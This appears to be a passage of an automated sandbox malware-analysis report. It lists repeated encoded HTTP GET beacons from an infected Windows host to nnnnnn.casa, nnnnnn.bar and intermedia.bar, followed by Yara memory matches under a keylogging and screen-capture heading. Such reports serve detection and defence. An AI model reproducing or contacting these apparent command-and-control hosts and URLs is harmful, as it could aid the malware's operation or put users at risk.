            Source: global trafficHTTP traffic detected: GET /drew/clKY_2F9qhXNW5H/_2BsVRKIgOamiE9mQB/_2FVdwPGE/BPO6UbinW_2B8Sjp_2Bo/55Xmf7HJU6cUJy8fy4_/2FKKDKVKISZpEe4syLM93A/M41SvTBw4e_2F/120g53mI/wJJMq93zmJf2crfPUE2j_2B/GM6GQoMDYy/B7CUA1_2BisXnKYTP/uGoP10_2BxHm/imkRUl8or1j/Bw6x7_2BZqhh0x/t_2F833CW3gz1lZ3CY6hP/Kii0oYYxRGsc8HdH/lkRH05yG/dOy.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.nnnnnn.casa
            Source: global trafficHTTP traffic detected: GET /drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/yqgihjnBibJ7A/XFM70xPC/k6eiWJVJqKPxcBagtbpzYza/NlHEbEmmi7/vuGEJMNlQ1ObhV2oW/rd9F4zr3c1pJ/QKF_2Be_2FQ/FAjItCUxNnc_2F/AZLNfB_2F0wEo2yB8q4IT/5jOobJTmOZV0xI1G/PQCUJuBWP_2BhVv/3KeFUrNGz_2F78lMYB/sTd1utk6n/RxKHmVVj062yJJKsJ9OD/wmN6xR72HBTI1vctHQe/N2GeMZrwI0t/YLW2CSzao/q.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.nnnnnn.casa
            Source: global trafficHTTP traffic detected: GET /drew/zd0veKiw3e_2FVw/JJ7tbavOiQvA9d8rHF/MReVkRvio/SC3uRIruy_2BXo_2FvjQ/5wwzMoShaTYrGjtEhg7/Q4EU_2F58MrLDOMpnwDvQl/4oAzAGZ9KhB2P/11ho7azQ/oSQaJwmg4Z33JCzj8wVAL4y/p2pAzghuFr/NTjo_2FX5hnFJvVKJ/pSUsYhZ3ii5t/IXWGFfzs8Ne/P3kSZsDcK04c9o/M4TxQU3QgnIS7BTTFhUW8/eYRw_2Bi9Rap_2/FlW.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/nTzA1Bin3XQcZS3BPXoT/VC_2Bwejhc_2FIgAnHO/80iaugMV57_2B03WjjJnn8/4gxAs_2BxmZF7/TOVjb2Ah/pgPNUHZ17T9L8wycKkEjCiK/jeMuH8DdRv/juOnp0_2FGJ7c6qP0/x_2Fz3dEM_2F/deoZvnQAfFk/Wc5jOa5bWcm0MC/RWrwyt3pkcQtiY4AsZ3n7/MKKE_2FX_2FFdYj9/qoI9Xq_2BCQEmwG/Nwb7IgT0IyCbKBnKn_/2FiegfuYZI5/GhR0CO9.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.casaConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGdcDC1Vg/H9xTO58gw9Sr3I5f1oE/852oWfQLj1eL_2Fm_2FKnu/SIHTeaF7Bgvig/PyHxZLDk/ZUvCeNpaiixducNV9xRZlOg/1p1YKkAvPe/T6UiZU08MHesYFSbA/viVchsnOxqJ5/4YMncTmEmBk/k6T3NHIv66mymC/b7Hkig2fkyCUi/2.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.nnnnnn.casa
            Source: global trafficHTTP traffic detected: GET /drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F_2F05Q3POeadiys1/9wLWHm6Gx/wqhNI29IdUdv3CWDyCfs/2VD0tBt0szHqPTGNMaP/H8c1RSlzmz7xA6aMxeunJS/egWxomuGkwbso/At2D20BI/siieXymS6PJr8im_2FPJeye/Czlrk0gGlx/B4_2FnRkW1_2FVYbi/FmMXH_2Bbn2q/9Abbe5hphXR/x.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.nnnnnn.casa
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f/MEql68nFt/nYxdw4RZXpFaqbijhmkw/0I3UhZ9PcRsKOEspkq8/7YzXu2AOi0fYDlLet1LtxN/Z8j42Kwsx6Kh3/NutAzqvZ/KcYW58Xr4T1MQTJAJB2YAhX/pcuj3_2Fx_/2BQrkwFa603_2B68s/I0dGq_2F0eCx/w74Pufb9K3x/hd2DOR_2F/4NgLz6GD.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara matchFile source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR
